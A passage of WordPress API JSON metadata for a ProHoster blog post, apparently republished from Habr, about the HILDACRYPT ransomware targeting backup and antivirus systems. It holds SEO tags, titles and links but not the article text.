[&hellip;]<\/p>\n","protected":false,"gt_translate_keys":[{"key":"rendered","format":"html"}]},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[688],"tags":[],"class_list":["post-52277","post","type-post","status-publish","format-standard","hentry","category-administrirovanie"],"aioseo_notices":[],"aioseo_head":"\n\t\t<!-- All in One SEO 5.0.2 - aioseo.com -->\n\t<meta name=\"description\" content=\"\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware.\" \/>\n\t<meta name=\"robots\" content=\"max-image-preview:large\" \/>\n\t<meta name=\"author\" content=\"Yuri Gagarin\"\/>\n\t<link rel=\"canonical\" href=\"https:\/\/prohoster.info\/es\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam\" \/>\n\t<meta name=\"generator\" content=\"All in One SEO (AIOSEO) 5.0.2\" \/>\n\t\t<meta property=\"og:locale\" content=\"es_ES\" \/>\n\t\t<meta property=\"og:site_name\" content=\"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b\" \/>\n\t\t<meta property=\"og:type\" content=\"article\" \/>\n\t\t<meta property=\"og:title\" content=\"\ud83e\udd47HILDACRYPT: \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c \u043d\u0430\u043d\u043e\u0441\u0438\u0442 \u0443\u0434\u0430\u0440 \u043f\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u043e\u0433\u043e \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u043c | ProHoster\" \/>\n\t\t<meta property=\"og:description\" content=\"\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware.\" \/>\n\t\t<meta property=\"og:url\" content=\"https:\/\/prohoster.info\/es\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam\" \/>\n\t\t<meta property=\"og:image\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:secure_url\" content=\"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg\" \/>\n\t\t<meta property=\"og:image:width\" content=\"350\" \/>\n\t\t<meta property=\"og:image:height\" content=\"350\" \/>\n\t\t<meta property=\"article:published_time\" content=\"2019-11-04T21:00:00+00:00\" \/>\n\t\t<meta property=\"article:modified_time\" content=\"2020-02-18T10:59:57+00:00\" \/>\n\t\t<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<meta property=\"article:author\" content=\"https:\/\/www.facebook.com\/prohoster\" \/>\n\t\t<!-- All in One SEO -->\n\n","aioseo_head_json":{"title":"\ud83e\udd47HILDACRYPT: un nuevo ransomware ataca los sistemas de respaldo y soluciones antivirus | ProHoster","description":"\u00a1Hola, Habr! Nuevamente estamos hablando sobre las \u00faltimas versiones de malware de la categor\u00eda Ransomware.","canonical_url":"https:\/\/prohoster.info\/es\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","robots":"max-image-preview:large","keywords":"","webmasterTools":{"miscellaneous":""},"schema":null,"og:locale":"es_ES","og:site_name":"ProHoster | \u041a\u0443\u043f\u0438\u0442\u044c \u043d\u0430\u0434\u0435\u0436\u043d\u044b\u0439 \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u0441\u0430\u0439\u0442\u043e\u0432 \u0441 \u0437\u0430\u0449\u0438\u0442\u043e\u0439 \u043e\u0442 DDoS, VPS VDS \u0441\u0435\u0440\u0432\u0435\u0440\u044b","og:type":"article","og:title":"\ud83e\udd47HILDACRYPT: \u043d\u043e\u0432\u0430\u044f \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u0430-\u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u044c \u043d\u0430\u043d\u043e\u0441\u0438\u0442 \u0443\u0434\u0430\u0440 \u043f\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0440\u0435\u0437\u0435\u0440\u0432\u043d\u043e\u0433\u043e \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0438 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u044b\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u043c | ProHoster","og:description":"\u041f\u0440\u0438\u0432\u0435\u0442, \u0425\u0430\u0431\u0440! \u0418 \u0441\u043d\u043e\u0432\u0430 \u043c\u044b \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u0435\u043c \u043e \u0441\u0432\u0435\u0436\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u044f\u0445 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u041f\u041e \u0438\u0437 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u0438 Ransomware.","og:url":"https:\/\/prohoster.info\/es\/blog\/administrirovanie\/hildacrypt-novaya-programma-vymogatel-nanosit-udar-po-sistemam-rezervnogo-kopirovaniya-i-antivirusnym-resheniyam","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2019-11-04T21:00:00+00:00","article:modified_time":"2020-02-18T10:59:57+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"52277","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":"2026-01-24 03:06:20","breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-02-28 17:13:20","updated":"2026-01-24 03:06:20","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/posts\/52277","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/comments?post=52277"}],"version-history":[{"count":0,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/posts\/52277\/revisions"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/media?parent=52277"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/categories?post=52277"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/es\/wp-json\/wp\/v2\/tags?post=52277"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}